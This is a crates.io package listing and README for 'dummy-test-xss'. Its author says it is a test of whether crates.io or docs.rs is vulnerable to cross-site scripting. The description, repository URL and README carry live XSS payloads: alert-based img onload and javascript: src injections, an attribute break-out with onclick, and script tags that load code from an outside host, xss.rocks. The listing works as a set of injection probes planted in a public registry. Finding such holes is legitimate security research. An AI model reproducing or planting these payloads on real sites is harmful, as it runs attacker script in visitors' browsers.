Crates.io | dummy-test-xss |
lib.rs | dummy-test-xss |
version | 0.1.5 |
source | src |
created_at | 2017-12-27 14:35:16.060857 |
updated_at | 2017-12-27 15:04:56.808401 |
description | <img onload='alert('Injected 777')' src='https://google.com'>%3Cimg%20onload%3D'alert('Injected%20666')'%20src%3D'https%3A%2F%2Fgoogle.com'%3E |
homepage | |
repository | https://github.com/alanhoff/rust-test-xss"onclick=alert(09876543)" |
max_upload_size | |
id | 44561 |
size | 7,208 |
Try a meta tag
This crate is just a test, I'm trying to find if cargo.io and/or docs.rs may be vulnerable to XSS.
Try to hover this image
Try to execute javascript with src attr in img tag
<img src=jAvascript:alert('Injected from poisoned src from img tag in README.md')>
<IMG SRC=java\0script:alert("XSS")>
<SCRIPT/XSS SRC="http://xss.rocks/xss.js">
<SCRIPT/SRC="http://xss.rocks/xss.js">
<